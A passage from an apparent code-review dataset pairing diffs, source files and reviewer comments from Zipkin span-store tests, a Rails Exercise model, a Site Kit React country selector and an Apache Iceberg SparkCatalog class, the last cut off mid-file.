.containsExactly(asList(barAndFooAndBazAndQux), asList(barAndFoo));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").addAnnotation("foo").addAnnotation("bar").addBinaryAnnotation("baz", "qux").build()))
.containsExactly(asList(barAndFooAndBazAndQux));
}
/**
* This test makes sure that annotation queries pay attention to which host logged an annotation.
*/
@Test
public void getTraces_differentiateOnServiceName() {
Span trace1 = Span.builder().traceId(1).name("get").id(1)
.timestamp((today + 1) * 1000)
.addAnnotation(Annotation.create((today + 1) * 1000, CLIENT_SEND, WEB_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, SERVER_RECV, APP_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, SERVER_SEND, APP_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, CLIENT_RECV, WEB_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, "web", WEB_ENDPOINT))
.addBinaryAnnotation(BinaryAnnotation.create("local", "web", WEB_ENDPOINT))
.addBinaryAnnotation(BinaryAnnotation.create("web-b", "web", WEB_ENDPOINT))
.build();
Span trace2 = Span.builder().traceId(2).name("get").id(2)
.timestamp((today + 2) * 1000)
.addAnnotation(Annotation.create((today + 1) * 1000, CLIENT_SEND, APP_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, SERVER_RECV, WEB_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, SERVER_SEND, WEB_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, CLIENT_RECV, APP_ENDPOINT))
.addAnnotation(Annotation.create((today + 1) * 1000, "app", APP_ENDPOINT))
.addBinaryAnnotation(BinaryAnnotation.create("local", "app", APP_ENDPOINT))
.addBinaryAnnotation(BinaryAnnotation.create("app-b", "app", APP_ENDPOINT))
.build();
accept(trace1, trace2);
assertThat(store().getTraces(QueryRequest.builder().build()))
.containsExactly(asList(trace2), asList(trace1));
// We only return traces where the service specified caused the annotation queried.
assertThat(store().getTraces(QueryRequest.builder().serviceName("web").addAnnotation("web").build()))
.containsExactly(asList(trace1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("app").addAnnotation("web").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("app").addAnnotation("app").build()))
.containsExactly(asList(trace2));
assertThat(store().getTraces(QueryRequest.builder().serviceName("web").addAnnotation("app").build()))
.isEmpty();
// Binary annotations are not returned for annotation queries
assertThat(store().getTraces(QueryRequest.builder().serviceName("web").addAnnotation("web-b").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("app").addAnnotation("web-b").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("app").addAnnotation("app-b").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("web").addAnnotation("app-b").build()))
.isEmpty();
// We only return traces where the service specified caused the binary value queried.
assertThat(store().getTraces(QueryRequest.builder().serviceName("web")
.addBinaryAnnotation("local", "web").build()))
.containsExactly(asList(trace1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("app")
.addBinaryAnnotation("local", "web").build()))
.isEmpty();
assertThat(store().getTraces(QueryRequest.builder().serviceName("app")
.addBinaryAnnotation("local", "app").build()))
.containsExactly(asList(trace2));
assertThat(store().getTraces(QueryRequest.builder().serviceName("web")
.addBinaryAnnotation("local", "app").build()))
.isEmpty();
}
/** Make sure empty binary annotation values don't crash */
@Test
public void getTraces_binaryAnnotationWithEmptyValue() {
Span span = Span.builder()
.traceId(1)
.name("call1")
.id(1)
.timestamp((today + 1) * 1000)
.addBinaryAnnotation(BinaryAnnotation.create("empty", "", ep)).build();
accept(span);
assertThat(store().getTraces((QueryRequest.builder().serviceName("service").build())))
.containsExactly(asList(span));
assertThat(store().getTrace(1L))
.containsExactly(span);
}
/**
* It is expected that [[com.twitter.zipkin.storage.SpanStore.apply]] will receive the same span
* id multiple times with different annotations. At query time, these must be merged.
*/
@Test
public void getTraces_mergesSpans() {
accept(span1, span4, span5); // span4, span5 have the same span id
SortedSet<Annotation> mergedAnnotations = new TreeSet<>(span4.annotations);
mergedAnnotations.addAll(span5.annotations);
Span merged = span4.toBuilder()
.timestamp(mergedAnnotations.first().timestamp)
.duration(mergedAnnotations.last().timestamp - mergedAnnotations.first().timestamp)
.annotations(mergedAnnotations)
.binaryAnnotations(span5.binaryAnnotations).build();
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").build()))
.containsExactly(asList(merged), asList(span1));
}
/** limit should apply to traces closest to endTs */
@Test
public void getTraces_limit() {
accept(span1, span3); // span1's timestamp is 1000, span3's timestamp is 2000
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").limit(1).build()))
.containsExactly(asList(span3));
}
/** Traces whose root span has timestamps before or at endTs are returned */
@Test
public void getTraces_endTsAndLookback() {
accept(span1, span3); // span1's timestamp is 1000, span3's timestamp is 2000
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 1L).build()))
.containsExactly(asList(span1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 2L).build()))
.containsExactly(asList(span3), asList(span1));
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 3L).build()))
.containsExactly(asList(span3), asList(span1));
}
/** Traces whose root span has timestamps between (endTs - lookback) and endTs are returned */
@Test
public void getTraces_lookback() {
accept(span1, span3); // span1's timestamp is 1000, span3's timestamp is 2000
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 1L).lookback(1L).build()))
.containsExactly(asList(span1));
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 2L).lookback(1L).build()))
.containsExactly(asList(span3), asList(span1));
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 3L).lookback(1L).build()))
.containsExactly(asList(span3));
assertThat(
store().getTraces(QueryRequest.builder().serviceName("service").endTs(today + 3L).lookback(2L).build()))
.containsExactly(asList(span3), asList(span1));
}
@Test
public void getAllServiceNames_emptyServiceName() {
accept(spanEmptyServiceName);
assertThat(store().getServiceNames()).isEmpty();
}
@Test
public void getSpanNames_emptySpanName() {
accept(spanEmptySpanName);
assertThat(store().getSpanNames(spanEmptySpanName.name)).isEmpty();
}
@Test
public void spanNamesGoLowercase() {
accept(span1);
assertThat(store().getTraces(QueryRequest.builder().serviceName("service").spanName("MeThOdCaLl").build()))
.containsOnly(asList(span1));
}
@Test
public void serviceNamesGoLowercase() {
accept(span1);
assertThat(store().getSpanNames("SeRvIcE")).containsExactly("methodcall");
assertThat(store().getTraces(QueryRequest.builder().serviceName("SeRvIcE").build()))
.containsOnly(asList(span1));
}
/**
* Basic clock skew correction is something span stores should support, until the UI supports
* happens-before without using timestamps. The easiest clock skew to correct is where a child
* appears to happen before the parent.
*
* <p>It doesn't matter if clock-skew correction happens at store or query time, as long as it
* occurs by the time results are returned.
*
* <p>Span stores who don't support this can override and disable this test, noting in the README
* the limitation.
*/
@Test
public void correctsClockSkew() {
Endpoint client = Endpoint.create("client", 192 << 24 | 168 << 16 | 1);
Endpoint frontend = Endpoint.create("frontend", 192 << 24 | 168 << 16 | 2);
Endpoint backend = Endpoint.create("backend", 192 << 24 | 168 << 16 | 3);
/** Intentionally not setting span.timestamp, duration */
Span parent = Span.builder()
.traceId(1)
.name("method1")
.id(666)
.addAnnotation(Annotation.create((today + 100) * 1000, CLIENT_SEND, client))
.addAnnotation(Annotation.create((today + 95) * 1000, SERVER_RECV, frontend)) // before client sends
.addAnnotation(Annotation.create((today + 120) * 1000, SERVER_SEND, frontend)) // before client receives
.addAnnotation(Annotation.create((today + 135) * 1000, CLIENT_RECV, client)).build();
/** Intentionally not setting span.timestamp, duration */
Span remoteChild = Span.builder()
.traceId(1)
.name("method2")
.id(777)
.parentId(666L)
.addAnnotation(Annotation.create((today + 100) * 1000, CLIENT_SEND, frontend))
.addAnnotation(Annotation.create((today + 115) * 1000, SERVER_RECV, backend))
.addAnnotation(Annotation.create((today + 120) * 1000, SERVER_SEND, backend))
.addAnnotation(Annotation.create((today + 115) * 1000, CLIENT_RECV, frontend)) // before server sent
.build();
/** Local spans must explicitly set timestamp */
Span localChild = Span.builder()
.traceId(1)
.name("local")
.id(778)
.parentId(666L)
.timestamp((today + 101) * 1000).duration(50L)
.addBinaryAnnotation(BinaryAnnotation.create(LOCAL_COMPONENT, "framey", frontend)).build();
List<Span> skewed = asList(parent, remoteChild, localChild);
// There's clock skew when the child doesn't happen after the parent
assertThat(skewed.get(0).annotations.get(0).timestamp)
.isLessThanOrEqualTo(skewed.get(1).annotations.get(0).timestamp)
.isLessThanOrEqualTo(skewed.get(2).timestamp); // local span
// Regardless of when clock skew is corrected, it should be corrected before traces return
accept(parent, remoteChild, localChild);
List<Span> adjusted = store().getTrace(1L);
// After correction, the child happens after the parent
assertThat(adjusted.get(0).timestamp)
.isLessThanOrEqualTo(adjusted.get(0).timestamp);
// After correction, children happen after their parent
assertThat(adjusted.get(0).timestamp)
.isLessThanOrEqualTo(adjusted.get(1).timestamp)
.isLessThanOrEqualTo(adjusted.get(2).timestamp);
// And we do not change the parent (client) duration, due to skew in the child (server)
assertThat(adjusted.get(0).duration).isEqualTo(clientDuration(skewed.get(0)));
assertThat(adjusted.get(1).duration).isEqualTo(clientDuration(skewed.get(1)));
assertThat(adjusted.get(2).duration).isEqualTo(skewed.get(2).duration);
}
/**
* This test shows that regardless of whether span.timestamp and duration are set directly or
* derived from annotations, the client wins vs the server. This is important because the client
* holds the critical path of a shared span.
*/
@Test
public void clientTimestampAndDurationWinInSharedSpan() {
Endpoint client = Endpoint.create("client", 192 << 24 | 168 << 16 | 1);
Endpoint server = Endpoint.create("server", 192 << 24 | 168 << 16 | 2);
long clientTimestamp = (today + 100) * 1000;
long clientDuration = 35 * 1000;
// both client and server set span.timestamp, duration
Span clientView = Span.builder().traceId(1).name("direct").id(666)
.timestamp(clientTimestamp).duration(clientDuration)
.addAnnotation(Annotation.create((today + 100) * 1000, CLIENT_SEND, client))
.addAnnotation(Annotation.create((today + 135) * 1000, CLIENT_RECV, client))
.build();
Span serverView = Span.builder().traceId(1).name("direct").id(666)
.timestamp((today + 105) * 1000).duration(25 * 1000L)
.addAnnotation(Annotation.create((today + 105) * 1000, SERVER_RECV, server))
.addAnnotation(Annotation.create((today + 130) * 1000, SERVER_SEND, server))
.build();
// neither client, nor server set span.timestamp, duration
Span clientViewDerived = Span.builder().traceId(1).name("derived").id(666)
.addAnnotation(Annotation.create(clientTimestamp, CLIENT_SEND, client))
.addAnnotation(Annotation.create(clientTimestamp + clientDuration, CLIENT_SEND, client))
.build();
Span serverViewDerived = Span.builder().traceId(1).name("derived").id(666)
.addAnnotation(Annotation.create((today + 105) * 1000, SERVER_RECV, server))
.addAnnotation(Annotation.create((today + 130) * 1000, SERVER_SEND, server))
.build();
accept(serverView, serverViewDerived); // server span hits the collection tier first
accept(clientView, clientViewDerived); // intentionally different collection event
for (Span span : store().getTrace(clientView.traceId)) {
assertThat(span.timestamp).isEqualTo(clientTimestamp);
assertThat(span.duration).isEqualTo(clientDuration);
}
}
// Bugs have happened in the past where trace limit was mistaken for span count.
@Test
public void traceWithManySpans() {
Span[] trace = new Span[101];
trace[0] = TestObjects.TRACE.get(0);
IntStream.range(0, 100).forEach(i -> {
Span s = TestObjects.TRACE.get(1);
trace[i + 1] = s.toBuilder()
.id(s.id + i)
.timestamp(s.timestamp + i)
.annotations(s.annotations.stream()
.map(a -> Annotation.create(a.timestamp + i, a.value, a.endpoint))
.collect(toList()))
.build();
});
accept(trace);
String serviceName = trace[1].annotations.get(0).endpoint.serviceName;
assertThat(store().getTraces(QueryRequest.builder().serviceName(serviceName).build()))
.containsExactly(asList(trace));
assertThat(store().getTrace(trace[0].traceId))
.containsExactly(trace);
assertThat(store().getRawTrace(trace[0].traceId))
.containsAll(asList(trace)); // order isn't guaranteed in raw trace
}
/**
* Spans report depth-first. Make sure the client timestamp is preferred when instrumentation
* don't add a timestamp.
*/
@Test
public void whenSpanTimestampIsMissingClientSendIsPreferred() {
Endpoint frontend = Endpoint.create("frontend", 192 << 24 | 168 << 16 | 2);
Annotation cs = Annotation.create((today + 50) * 1000, CLIENT_SEND, frontend);
Annotation cr = Annotation.create((today + 150) * 1000, CLIENT_RECV, frontend);
Endpoint backend = Endpoint.create("backend", 192 << 24 | 168 << 16 | 2);
Annotation sr = Annotation.create((today + 95) * 1000, SERVER_RECV, backend);
Annotation ss = Annotation.create((today + 100) * 1000, SERVER_SEND, backend);
Span span = Span.builder().traceId(1).name("method1").id(666).build();
// Simulate the server-side of a shared span arriving first
accept(span.toBuilder().addAnnotation(sr).addAnnotation(ss).build());
accept(span.toBuilder().addAnnotation(cs).addAnnotation(cr).build());
// Make sure that the client's timestamp won
assertThat(store().getTrace(span.traceId))
.containsExactly(span.toBuilder()
.timestamp(cs.timestamp)
.duration(cr.timestamp - cs.timestamp)
.annotations(asList(cs, sr, ss, cr)).build());
}
// This supports the "raw trace" feature, which skips application-level data cleaning
@Test
public void rawTrace_doesntPerformQueryTimeAdjustment() {
Endpoint producer = Endpoint.create("producer", 192 << 24 | 168 << 16 | 1);
Annotation ms = Annotation.create((today + 95) * 1000, "ms", producer);
Endpoint consumer = Endpoint.create("consumer", 192 << 24 | 168 << 16 | 2);
Annotation mr = Annotation.create((today + 100) * 1000, "mr", consumer);
Span span = Span.builder().traceId(1).name("message").id(666).build();
// Simulate instrumentation that sends annotations one at-a-time.
// This should prevent the collection tier from being able to calculate duration.
accept(span.toBuilder().addAnnotation(ms).build());
accept(span.toBuilder().addAnnotation(mr).build());
// Normally, span store implementations will merge spans by id and add duration by query time
assertThat(store().getTrace(span.traceId))
.containsExactly(span.toBuilder()
.timestamp(ms.timestamp)
.duration(mr.timestamp - ms.timestamp)
.annotations(asList(ms, mr)).build());
// Since a collector never saw both sides of the span, we'd not see duration in the raw trace.
for (Span raw : store().getRawTrace(span.traceId)) {
assertThat(raw.timestamp).isNull();
assertThat(raw.duration).isNull();
}
}
@Test public void getTraces_acrossServices() {
List<BinaryAnnotation> annotations = IntStream.rangeClosed(1, 10).mapToObj(i ->
BinaryAnnotation.create(LOCAL_COMPONENT, "serviceAnnotation",
Endpoint.create("service" + i, 127 << 24 | i)))
.collect(Collectors.toList());
long gapBetweenSpans = 100;
List<Span> earlySpans = IntStream.rangeClosed(1, 10).mapToObj(i -> Span.builder().name("early")
.traceId(i).id(i).timestamp((today - i) * 1000).duration(1L)
.addBinaryAnnotation(annotations.get(i - 1)).build()).collect(toList());
List<Span> lateSpans = IntStream.rangeClosed(1, 10).mapToObj(i -> Span.builder().name("late")
.traceId(i + 10).id(i + 10).timestamp((today + gapBetweenSpans - i) * 1000).duration(1L)
.addBinaryAnnotation(annotations.get(i - 1)).build()).collect(toList());
accept(earlySpans.toArray(new Span[10]));
accept(lateSpans.toArray(new Span[10]));
List<Span>[] earlyTraces =
earlySpans.stream().map(Collections::singletonList).toArray(List[]::new);
List<Span>[] lateTraces =
lateSpans.stream().map(Collections::singletonList).toArray(List[]::new);
//sanity checks
assertThat(store().getTraces(QueryRequest.builder().serviceName("service1").build()))
.containsExactly(lateTraces[0], earlyTraces[0]);
assertThat(store().getTraces(QueryRequest.builder().limit(20).build()))
.hasSize(20);
assertThat(store().getTraces(QueryRequest.builder().limit(10).build()))
.containsExactly(lateTraces);
assertThat(store().getTraces(QueryRequest.builder().limit(20)
.endTs(today + gapBetweenSpans).lookback(gapBetweenSpans).build()))
.containsExactly(lateTraces);
assertThat(store().getTraces(QueryRequest.builder().limit(20)
.endTs(today).build()))
.containsExactly(earlyTraces);
}
static long clientDuration(Span span) {
long[] timestamps = span.annotations.stream()
.filter(a -> a.value.startsWith("c"))
.mapToLong(a -> a.timestamp)
.sorted().toArray();
return timestamps[1] - timestamps[0];
}
}
| 1 | 11,785 | before, a binary annotation had the same service name as a regular annotation, masking the bug where we weren't querying the latter | openzipkin-zipkin | java |
@@ -1,4 +1,6 @@
class Exercise < ActiveRecord::Base
+ AVERAGE_COMPLETION_TIME_IN_MINUTES = 7
+
has_many :statuses, as: :completeable, dependent: :destroy
has_one :trail, through: :step, as: :completeables
has_one :step, dependent: :destroy, as: :completeable | 1 | class Exercise < ActiveRecord::Base
has_many :statuses, as: :completeable, dependent: :destroy
has_one :trail, through: :step, as: :completeables
has_one :step, dependent: :destroy, as: :completeable
validates :name, presence: true
validates :url, presence: true
def trail_name
trail.try(:name)
end
def self.ordered
order(:created_at)
end
def accessible_without_subscription?
false
end
end
| 1 | 18,416 | Where does the `7` come from? | thoughtbot-upcase | rb |
@@ -48,7 +48,7 @@ export default function CountrySelect() {
timezone: countriesByCode[ newCountryCode ].defaultTimeZoneId,
} );
}
- }, [ setValues ] );
+ }, [ setValues, value ] );
return (
<Select | 1 | /**
* CountrySelect component.
*
* Site Kit by Google, Copyright 2021 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* WordPress dependencies
*/
import { useCallback } from '@wordpress/element';
import { __ } from '@wordpress/i18n';
/**
* Internal dependencies
*/
import {
Select,
Option,
} from '../../../../../material-components';
import { allCountries, countriesByCode } from '../../../util/countries-timezones';
import Data from 'googlesitekit-data';
import { FORM_ACCOUNT_CREATE } from '../../../datastore/constants';
import { CORE_FORMS } from '../../../../../googlesitekit/datastore/forms/constants';
const { useSelect, useDispatch } = Data;
export default function CountrySelect() {
const value = useSelect( ( select ) => select( CORE_FORMS ).getValue( FORM_ACCOUNT_CREATE, 'countryCode' ) );
const { setValues } = useDispatch( CORE_FORMS );
const onEnhancedChange = useCallback( ( i, item ) => {
const newCountryCode = item.dataset.value;
if ( newCountryCode !== value && countriesByCode[ newCountryCode ] ) {
setValues( FORM_ACCOUNT_CREATE, {
countryCode: newCountryCode,
// eslint-disable-next-line sitekit/acronym-case
timezone: countriesByCode[ newCountryCode ].defaultTimeZoneId,
} );
}
}, [ setValues ] );
return (
<Select
className="googlesitekit-analytics__select-country"
label={ __( 'Country', 'google-site-kit' ) }
value={ value }
onEnhancedChange={ onEnhancedChange }
enhanced
outlined
>
{
allCountries.map( ( { countryCode, displayName }, i ) => (
<Option
key={ i }
value={ countryCode }
>
{ displayName }
</Option>
) )
}
</Select>
);
}
| 1 | 37,758 | I don't know how we haven't got bugs from some of these! As here this would have had a stale `value` | google-site-kit-wp | js |
@@ -199,6 +199,9 @@ public class SparkCatalog extends BaseCatalog {
setSnapshotId = set;
} else if ("cherry-pick-snapshot-id".equalsIgnoreCase(set.property())) {
pickSnapshotId = set;
+ } else if ("sort-order".equalsIgnoreCase(set.property())) {
+ throw new UnsupportedOperationException("'sort-order' is a reserved table property. Please use the command " +
+ "'ALTER TABLE ... WRITE ORDERED BY' to specify it.");
} else {
propertyChanges.add(set);
} | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.iceberg.spark;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.TreeMap;
import org.apache.hadoop.conf.Configuration;
import org.apache.iceberg.CachingCatalog;
import org.apache.iceberg.CatalogUtil;
import org.apache.iceberg.Schema;
import org.apache.iceberg.Table;
import org.apache.iceberg.Transaction;
import org.apache.iceberg.catalog.Catalog;
import org.apache.iceberg.catalog.Namespace;
import org.apache.iceberg.catalog.SupportsNamespaces;
import org.apache.iceberg.catalog.TableIdentifier;
import org.apache.iceberg.exceptions.AlreadyExistsException;
import org.apache.iceberg.hadoop.HadoopCatalog;
import org.apache.iceberg.hadoop.HadoopTables;
import org.apache.iceberg.relocated.com.google.common.base.Preconditions;
import org.apache.iceberg.relocated.com.google.common.base.Splitter;
import org.apache.iceberg.relocated.com.google.common.collect.ImmutableMap;
import org.apache.iceberg.relocated.com.google.common.collect.ImmutableSet;
import org.apache.iceberg.relocated.com.google.common.collect.Lists;
import org.apache.iceberg.relocated.com.google.common.collect.Maps;
import org.apache.iceberg.relocated.com.google.common.collect.Sets;
import org.apache.iceberg.spark.source.SparkTable;
import org.apache.iceberg.spark.source.StagedSparkTable;
import org.apache.spark.sql.SparkSession;
import org.apache.spark.sql.catalyst.analysis.NamespaceAlreadyExistsException;
import org.apache.spark.sql.catalyst.analysis.NoSuchNamespaceException;
import org.apache.spark.sql.catalyst.analysis.NoSuchTableException;
import org.apache.spark.sql.catalyst.analysis.TableAlreadyExistsException;
import org.apache.spark.sql.connector.catalog.Identifier;
import org.apache.spark.sql.connector.catalog.NamespaceChange;
import org.apache.spark.sql.connector.catalog.StagedTable;
import org.apache.spark.sql.connector.catalog.TableCatalog;
import org.apache.spark.sql.connector.catalog.TableChange;
import org.apache.spark.sql.connector.catalog.TableChange.ColumnChange;
import org.apache.spark.sql.connector.catalog.TableChange.RemoveProperty;
import org.apache.spark.sql.connector.catalog.TableChange.SetProperty;
import org.apache.spark.sql.connector.expressions.Transform;
import org.apache.spark.sql.types.StructType;
import org.apache.spark.sql.util.CaseInsensitiveStringMap;
/**
* A Spark TableCatalog implementation that wraps an Iceberg {@link Catalog}.
* <p>
* This supports the following catalog configuration options:
* <ul>
* <li><code>type</code> - catalog type, "hive" or "hadoop"</li>
* <li><code>uri</code> - the Hive Metastore URI (Hive catalog only)</li>
* <li><code>warehouse</code> - the warehouse path (Hadoop catalog only)</li>
* <li><code>default-namespace</code> - a namespace to use as the default</li>
* </ul>
* <p>
* To use a custom catalog that is not a Hive or Hadoop catalog, extend this class and override
* {@link #buildIcebergCatalog(String, CaseInsensitiveStringMap)}.
*/
public class SparkCatalog extends BaseCatalog {
private static final Set<String> DEFAULT_NS_KEYS = ImmutableSet.of(TableCatalog.PROP_OWNER);
private String catalogName = null;
private Catalog icebergCatalog = null;
private boolean cacheEnabled = true;
private SupportsNamespaces asNamespaceCatalog = null;
private String[] defaultNamespace = null;
private HadoopTables tables;
/**
* Build an Iceberg {@link Catalog} to be used by this Spark catalog adapter.
*
* @param name Spark's catalog name
* @param options Spark's catalog options
* @return an Iceberg catalog
*/
protected Catalog buildIcebergCatalog(String name, CaseInsensitiveStringMap options) {
Configuration conf = SparkSession.active().sessionState().newHadoopConf();
Map<String, String> optionsMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER);
optionsMap.putAll(options);
return CatalogUtil.buildIcebergCatalog(name, optionsMap, conf);
}
/**
* Build an Iceberg {@link TableIdentifier} for the given Spark identifier.
*
* @param identifier Spark's identifier
* @return an Iceberg identifier
*/
protected TableIdentifier buildIdentifier(Identifier identifier) {
return Spark3Util.identifierToTableIdentifier(identifier);
}
@Override
public SparkTable loadTable(Identifier ident) throws NoSuchTableException {
try {
Table icebergTable = load(ident);
return new SparkTable(icebergTable, !cacheEnabled);
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
throw new NoSuchTableException(ident);
}
}
@Override
public SparkTable createTable(Identifier ident, StructType schema,
Transform[] transforms,
Map<String, String> properties) throws TableAlreadyExistsException {
Schema icebergSchema = SparkSchemaUtil.convert(schema);
try {
Catalog.TableBuilder builder = newBuilder(ident, icebergSchema);
Table icebergTable = builder
.withPartitionSpec(Spark3Util.toPartitionSpec(icebergSchema, transforms))
.withLocation(properties.get("location"))
.withProperties(Spark3Util.rebuildCreateProperties(properties))
.create();
return new SparkTable(icebergTable, !cacheEnabled);
} catch (AlreadyExistsException e) {
throw new TableAlreadyExistsException(ident);
}
}
@Override
public StagedTable stageCreate(Identifier ident, StructType schema, Transform[] transforms,
Map<String, String> properties) throws TableAlreadyExistsException {
Schema icebergSchema = SparkSchemaUtil.convert(schema);
try {
Catalog.TableBuilder builder = newBuilder(ident, icebergSchema);
Transaction transaction = builder.withPartitionSpec(Spark3Util.toPartitionSpec(icebergSchema, transforms))
.withLocation(properties.get("location"))
.withProperties(Spark3Util.rebuildCreateProperties(properties))
.createTransaction();
return new StagedSparkTable(transaction);
} catch (AlreadyExistsException e) {
throw new TableAlreadyExistsException(ident);
}
}
@Override
public StagedTable stageReplace(Identifier ident, StructType schema, Transform[] transforms,
Map<String, String> properties) throws NoSuchTableException {
Schema icebergSchema = SparkSchemaUtil.convert(schema);
try {
Catalog.TableBuilder builder = newBuilder(ident, icebergSchema);
Transaction transaction = builder.withPartitionSpec(Spark3Util.toPartitionSpec(icebergSchema, transforms))
.withLocation(properties.get("location"))
.withProperties(Spark3Util.rebuildCreateProperties(properties))
.replaceTransaction();
return new StagedSparkTable(transaction);
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
throw new NoSuchTableException(ident);
}
}
@Override
public StagedTable stageCreateOrReplace(Identifier ident, StructType schema, Transform[] transforms,
Map<String, String> properties) {
Schema icebergSchema = SparkSchemaUtil.convert(schema);
Catalog.TableBuilder builder = newBuilder(ident, icebergSchema);
Transaction transaction = builder.withPartitionSpec(Spark3Util.toPartitionSpec(icebergSchema, transforms))
.withLocation(properties.get("location"))
.withProperties(Spark3Util.rebuildCreateProperties(properties))
.createOrReplaceTransaction();
return new StagedSparkTable(transaction);
}
@Override
public SparkTable alterTable(Identifier ident, TableChange... changes) throws NoSuchTableException {
SetProperty setLocation = null;
SetProperty setSnapshotId = null;
SetProperty pickSnapshotId = null;
List<TableChange> propertyChanges = Lists.newArrayList();
List<TableChange> schemaChanges = Lists.newArrayList();
for (TableChange change : changes) {
if (change instanceof SetProperty) {
SetProperty set = (SetProperty) change;
if (TableCatalog.PROP_LOCATION.equalsIgnoreCase(set.property())) {
setLocation = set;
} else if ("current-snapshot-id".equalsIgnoreCase(set.property())) {
setSnapshotId = set;
} else if ("cherry-pick-snapshot-id".equalsIgnoreCase(set.property())) {
pickSnapshotId = set;
} else {
propertyChanges.add(set);
}
} else if (change instanceof RemoveProperty) {
propertyChanges.add(change);
} else if (change instanceof ColumnChange) {
schemaChanges.add(change);
} else {
throw new UnsupportedOperationException("Cannot apply unknown table change: " + change);
}
}
try {
Table table = load(ident);
commitChanges(table, setLocation, setSnapshotId, pickSnapshotId, propertyChanges, schemaChanges);
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
throw new NoSuchTableException(ident);
}
return null;
}
@Override
public boolean dropTable(Identifier ident) {
try {
return isPathIdentifier(ident) ?
tables.dropTable(((PathIdentifier) ident).location()) :
icebergCatalog.dropTable(buildIdentifier(ident));
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
return false;
}
}
@Override
public void renameTable(Identifier from, Identifier to) throws NoSuchTableException, TableAlreadyExistsException {
try {
checkNotPathIdentifier(from, "renameTable");
checkNotPathIdentifier(to, "renameTable");
icebergCatalog.renameTable(buildIdentifier(from), buildIdentifier(to));
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
throw new NoSuchTableException(from);
} catch (AlreadyExistsException e) {
throw new TableAlreadyExistsException(to);
}
}
@Override
public void invalidateTable(Identifier ident) {
try {
load(ident).refresh();
} catch (org.apache.iceberg.exceptions.NoSuchTableException ignored) {
// ignore if the table doesn't exist, it is not cached
}
}
@Override
public Identifier[] listTables(String[] namespace) {
return icebergCatalog.listTables(Namespace.of(namespace)).stream()
.map(ident -> Identifier.of(ident.namespace().levels(), ident.name()))
.toArray(Identifier[]::new);
}
@Override
public String[] defaultNamespace() {
if (defaultNamespace != null) {
return defaultNamespace;
}
return new String[0];
}
@Override
public String[][] listNamespaces() {
if (asNamespaceCatalog != null) {
return asNamespaceCatalog.listNamespaces().stream()
.map(Namespace::levels)
.toArray(String[][]::new);
}
return new String[0][];
}
@Override
public String[][] listNamespaces(String[] namespace) throws NoSuchNamespaceException {
if (asNamespaceCatalog != null) {
try {
return asNamespaceCatalog.listNamespaces(Namespace.of(namespace)).stream()
.map(Namespace::levels)
.toArray(String[][]::new);
} catch (org.apache.iceberg.exceptions.NoSuchNamespaceException e) {
throw new NoSuchNamespaceException(namespace);
}
}
throw new NoSuchNamespaceException(namespace);
}
@Override
public Map<String, String> loadNamespaceMetadata(String[] namespace) throws NoSuchNamespaceException {
if (asNamespaceCatalog != null) {
try {
return asNamespaceCatalog.loadNamespaceMetadata(Namespace.of(namespace));
} catch (org.apache.iceberg.exceptions.NoSuchNamespaceException e) {
throw new NoSuchNamespaceException(namespace);
}
}
throw new NoSuchNamespaceException(namespace);
}
@Override
public void createNamespace(String[] namespace, Map<String, String> metadata) throws NamespaceAlreadyExistsException {
if (asNamespaceCatalog != null) {
try {
if (asNamespaceCatalog instanceof HadoopCatalog && DEFAULT_NS_KEYS.equals(metadata.keySet())) {
// Hadoop catalog will reject metadata properties, but Spark automatically adds "owner".
// If only the automatic properties are present, replace metadata with an empty map.
asNamespaceCatalog.createNamespace(Namespace.of(namespace), ImmutableMap.of());
} else {
asNamespaceCatalog.createNamespace(Namespace.of(namespace), metadata);
}
} catch (AlreadyExistsException e) {
throw new NamespaceAlreadyExistsException(namespace);
}
} else {
throw new UnsupportedOperationException("Namespaces are not supported by catalog: " + catalogName);
}
}
@Override
public void alterNamespace(String[] namespace, NamespaceChange... changes) throws NoSuchNamespaceException {
